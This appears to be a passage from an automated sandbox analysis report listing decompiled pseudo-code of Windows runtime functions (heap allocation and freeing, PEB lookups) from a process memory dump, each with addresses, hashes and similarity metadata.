                                      • Opcode Fuzzy Hash: b4c03ca885a5bc6b33d08edc23d7bfe7a06cf55a6bffff0adf3287c31070a8f8
                                      • Instruction Fuzzy Hash: DDF0B435614144AACF02DB78C44CFB97B66FF04258F84825DD852A7568F764D8118785
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418CD6, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 36%
                                      			E05418CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x543d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E05367D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0538B640(E05389AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                      0x05418ce5
                                      0x05418ced
                                      0x05418cf0
                                      0x05418cfb
                                      0x05418d0d
                                      0x05418cfd
                                      0x05418d06
                                      0x05418d06
                                      0x05418d18
                                      0x05418d19
                                      0x05418d1b
                                      0x05418d20
                                      0x05418d33

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a8a655ad441b8d86d3ebd3397d6fb4efce8371e0789b69a9f277ac0d76cb809
                                      • Instruction ID: a95b10753884bd9ce067f6648aa4313f5e8ee3a54a61a296b5fb722f0fcb306c
                                      • Opcode Fuzzy Hash: 8a8a655ad441b8d86d3ebd3397d6fb4efce8371e0789b69a9f277ac0d76cb809
                                      • Instruction Fuzzy Hash: 27F08970A042089FDB04EBA8D945EAE77B4EF04244F500199F916EB390DA34D900C754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05344F2E, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05344F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E054188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0536C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5321030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                      0x05344f2e
                                      0x05344f34
                                      0x05344f38
                                      0x053a0b85
                                      0x053a0b85
                                      0x053a0b89
                                      0x053a0b9a
                                      0x053a0b9a
                                      0x053a0b9f
                                      0x00000000
                                      0x053a0b9f
                                      0x053a0b94
                                      0x053a0b98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a0b98
                                      0x05344f3e
                                      0x05344f48
                                      0x00000000
                                      0x05344f6e
                                      0x00000000
                                      0x05344f70

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b93f10f280f2de9bf62800bbdfe541b43767ff5483a418fb3bacf9fefc8732a
                                      • Instruction ID: 0918adc05b24768d6764f59e34393b51cc2b2ae71f90a00d1f7aef68440ae44f
                                      • Opcode Fuzzy Hash: 8b93f10f280f2de9bf62800bbdfe541b43767ff5483a418fb3bacf9fefc8732a
                                      • Instruction Fuzzy Hash: 50F0BE339256948FD764CB18C788F22B7E9FB007B8F045465D44687921C7A4EC48C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418B58, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 36%
                                      			E05418B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x543d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E05367D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0538B640(E05389AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                      0x05418b67
                                      0x05418b6f
                                      0x05418b72
                                      0x05418b7d
                                      0x05418b8f
                                      0x05418b7f
                                      0x05418b88
                                      0x05418b88
                                      0x05418b9a
                                      0x05418b9b
                                      0x05418b9d
                                      0x05418ba2
                                      0x05418bb5

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df1984bc4da661471173bd1e770dbc094b80d20838833e13d395e059abb506ca
                                      • Instruction ID: e20601fd0c8c1df8e05f40b50eed4a4216cadbf5665035763b1511e6dca397b6
                                      • Opcode Fuzzy Hash: df1984bc4da661471173bd1e770dbc094b80d20838833e13d395e059abb506ca
                                      • Instruction Fuzzy Hash: ADF089B0B142589FDB04EBA4D94AFBE77B4EF04304F440499B905DB391EA34D901C758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537A44B, Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0537A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5437b9c; // 0x0
				_t15 = __ecx;
				_t16 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0538FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                      0x0537a44b
                                      0x0537a453
                                      0x0537a472
                                      0x0537a476
                                      0x00000000
                                      0x0537a493
                                      0x0537a47a
                                      0x0537a47f
                                      0x0537a486
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a01dbc2596c31eaa3a5cfc20a10bea9724b89f11ce7f9c31c83c4ea95f17eed
                                      • Instruction ID: 9b3ebbd7f0e869c23ffc7efc3c646bd391304de0691702e908f303d32f24faf4
                                      • Opcode Fuzzy Hash: 6a01dbc2596c31eaa3a5cfc20a10bea9724b89f11ce7f9c31c83c4ea95f17eed
                                      • Instruction Fuzzy Hash: 68E09272F09421ABD3219B18AC44F6B73ADEBD5651F094039F505C7214DA6DDD11C7E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534F358, Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E0534F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0537F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L05364620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                      0x0534f35d
                                      0x0534f361
                                      0x0534f367
                                      0x0534f372
                                      0x0534f38c
                                      0x0534f38c
                                      0x0534f394

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                      • Instruction ID: b902a3b7f4f07b6b59da87c337d6ef06182d3c72fc01fa08dd63eeea41195f79
                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                      • Instruction Fuzzy Hash: 63E02632F40118FBDB31AAD99E09FABBBFCEB48A60F044196F904E7250D574AE00C6D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535FF60, Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0535FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x53211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E054188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E05360050(_t14);
				}
			}










                                      0x0535ff66
                                      0x0535ff6b
                                      0x00000000
                                      0x0535ff8f
                                      0x00000000
                                      0x0535ff8f

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22904a510932f0c0d70d5fbadbb4436d4ca6ffa59ca4cc6cd60929a8e1a8b610
                                      • Instruction ID: 5733387035884b11d21ba1d90bdff15a5436edb63a0336c2ed229cf1fdb185a1
                                      • Opcode Fuzzy Hash: 22904a510932f0c0d70d5fbadbb4436d4ca6ffa59ca4cc6cd60929a8e1a8b610
                                      • Instruction Fuzzy Hash: 7CE0DFF02092849FD734DB52D344F2537BEAB42631F19A01EFC084B901C661E880C22A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053D41E8, Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E053D41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x54208f0);
				_t5 = E0539D08C(__ebx, __edi, __esi);
				if( *0x54387ec == 0) {
					E0535EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x54387ec == 0) {
						 *0x54387f0 = 0x54387ec;
						 *0x54387ec = 0x54387ec;
						 *0x54387e8 = 0x54387e4;
						 *0x54387e4 = 0x54387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L053D4248();
				}
				return E0539D0D1(_t5);
			}





                                      0x053d41e8
                                      0x053d41ea
                                      0x053d41ef
                                      0x053d41fb
                                      0x053d4206
                                      0x053d420b
                                      0x053d4216
                                      0x053d421d
                                      0x053d4222
                                      0x053d422c
                                      0x053d4231
                                      0x053d4231
                                      0x053d4236
                                      0x053d423d
                                      0x053d423d
                                      0x053d4247

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e148c28c39a95ab8956a4d6f79757ab842e52c32ccdefbab29a2319d8a122908
                                      • Instruction ID: d0f5095bc7c72beb5ecbfa7faaf155050bac9391a6d76fd5d8b96a68e7a9d084
                                      • Opcode Fuzzy Hash: e148c28c39a95ab8956a4d6f79757ab842e52c32ccdefbab29a2319d8a122908
                                      • Instruction Fuzzy Hash: 20F01C75926700CECB64DFA4A90A794FEB6F744310F90415AF004A72A4DBB45540CF11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053FD380, Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053FD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0534E8B0(__ecx, _a4, 0xfff);
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                      0x053fd38a
                                      0x053fd39b
                                      0x053fd3b1
                                      0x00000000
                                      0x053fd3b6
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                      • Instruction ID: 6640fa94a046c25e5664115c21539b774e7894ff68e5c01c2550a1532d7563a3
                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                      • Instruction Fuzzy Hash: 39E0C231380204BBDB22AE84CC04F797B5BEB40BA0F104432FF089AB90C675AC91EBC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537A185, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0537A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x54367e4 >= 0xa) {
					if(_t5 < 0x5436800 || _t5 >= 0x5436900) {
						return L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E05360010(0x54367e0, _t5);
				}
			}





                                      0x0537a190
                                      0x0537a1a6
                                      0x0537a1c2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0537a192
                                      0x0537a192
                                      0x0537a19f
                                      0x0537a19f

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2bbe5690a3992f0d9241b262354ddcfd870660ace5eccbb02f5e8dcd6c71f1f
                                      • Instruction ID: 135af116cd800744d697d30f75ca3f10234abd66bd678e9c89290a63499a7193
                                      • Opcode Fuzzy Hash: f2bbe5690a3992f0d9241b262354ddcfd870660ace5eccbb02f5e8dcd6c71f1f
                                      • Instruction Fuzzy Hash: A3D02B3163900436D73C9310889AF793722E788700FF2444EF1034A5B4EF5888D08118
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053716E0, Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E05371710(0x54367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L05364620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                      0x053716e8
                                      0x053716ef
                                      0x053716f3
                                      0x053716fe
                                      0x00000000
                                      0x05371700
                                      0x0537170d
                                      0x0537170d
                                      0x053716f2
                                      0x053716f2
                                      0x053716f2
                                      0x053716f2

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2734b4c28a609eadeac9ff87468d77e899e32a273e781982c1bc0abdf2aa12de
                                      • Instruction ID: f80a3169c4459ce8b60e08030628bc79f0bbab9fefa0095fd331c239d23b1039
                                      • Opcode Fuzzy Hash: 2734b4c28a609eadeac9ff87468d77e899e32a273e781982c1bc0abdf2aa12de
                                      • Instruction Fuzzy Hash: 40D0A972600240A2DE3D5B10D898B15226AEBC0B82F3800ACF60B898D0CFE8CCA2E04C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C53CA, Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053C53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0535EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                      0x053c53ca
                                      0x053c53ce
                                      0x053c53d9
                                      0x053c53de
                                      0x053c53e1
                                      0x053c53e1
                                      0x053c53e6
                                      0x053c53f3
                                      0x00000000
                                      0x053c53f8
                                      0x053c53fb

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction ID: 93ee216691459ed9405187ea1b0b9259b7e2c20c8ad951a9faef7e642a8baff1
                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction Fuzzy Hash: 33E08C31A486809BCF12DF88CA54F5EBBF9FB44B00F140088A4099B620C6A4AD00CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053735A1, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0535EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                      0x053735a1
                                      0x053735a1
                                      0x053735a5
                                      0x053735ab
                                      0x053735ab
                                      0x053735b5
                                      0x00000000
                                      0x053735c1
                                      0x053735b7

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction ID: dee77a8a626aaa128dcd632b282fc135f514bc280341513e001bec1d166809a0
                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction Fuzzy Hash: 4DD0C931E591889ADB61EB54C218B6C77B7BB0023AF5828A9944606952C37E4A5EFE01
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535AAB0, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0535AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                      0x0535aab6
                                      0x0535aabb
                                      0x053aa442
                                      0x00000000
                                      0x053aa448
                                      0x053aa454
                                      0x053aa454
                                      0x0535aac1
                                      0x0535aac1
                                      0x0535aac6
                                      0x0535aac6

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction ID: 28b48c98be726e5a8ff891a0ae97cc88654d4871093b92e2aec07a4db9c5a48f
                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction Fuzzy Hash: A8D0E936352E80CFD616CB1DC564F1573A5FB44B45FC50590F901CB761E66CD954CA10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053CA537, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053CA537(intOrPtr _a4, intOrPtr _a8) {

				return L05368E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                      0x053ca553

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction ID: b49bd5a465bf471f1fff6ad362e26ab03e1e01e83a37ae6794d7625114d2e69b
                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction Fuzzy Hash: 37C08C33180248BBCB126F81CC00F06BF6AFB98B60F008014FA480B570C632E970EB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534DB40, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0534DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L05364620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                      0x0534db4d
                                      0x0534db54
                                      0x0534db5f
                                      0x0534db56
                                      0x0534db56
                                      0x0534db5c
                                      0x0534db5c

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction ID: 984eb8ced9d73b3bdca7598d7389ae57b31c5a129459404af3dfa4ba5ddb8da5
                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction Fuzzy Hash: 98C08C30380A00AAEB221F20CD11B0136A0BB01B05F4404A06301DA0F0DBBCE801EA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534AD30, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0534AD30(intOrPtr _a4) {

				return L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                      0x0534ad49

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction ID: 514ee6f9c084431ef7bafd121c4dfa87b9847d8454b338521750e9e9eabff54f
                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction Fuzzy Hash: 64C02B331C0248BBC7126F45CD00F117F2DE790B60F004020F6044B671C936EC61D588
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053576E2, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                      0x053576e4
                                      0x00000000
                                      0x053576f8
                                      0x053576fd

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction ID: 7dbf8ee784488646d710e83687ad746938949fc7d1d331db1064fe29dc3d3c48
                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction Fuzzy Hash: 94C08C702511805AEB2A5708CE24F303650FB08658F88119CAE02494A5C3ACA807C208
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053736CC, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E053736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                      0x053736d2
                                      0x053736e8
                                      0x053736d4
                                      0x053736e5
                                      0x053736e5

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
